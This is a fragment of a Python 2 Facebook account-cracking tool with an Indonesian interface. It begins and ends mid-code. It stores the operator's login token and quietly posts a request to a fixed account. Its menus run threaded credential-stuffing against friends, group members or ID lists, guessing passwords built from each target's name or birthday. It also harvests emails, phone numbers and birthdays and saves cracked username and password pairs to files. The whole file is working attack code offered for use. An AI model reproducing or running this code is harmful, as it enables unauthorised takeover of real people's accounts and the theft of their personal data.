reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 5.0; ASUS ZenFone 2 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m The Magizz \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/TheMagizz\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/rizz.magizz\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
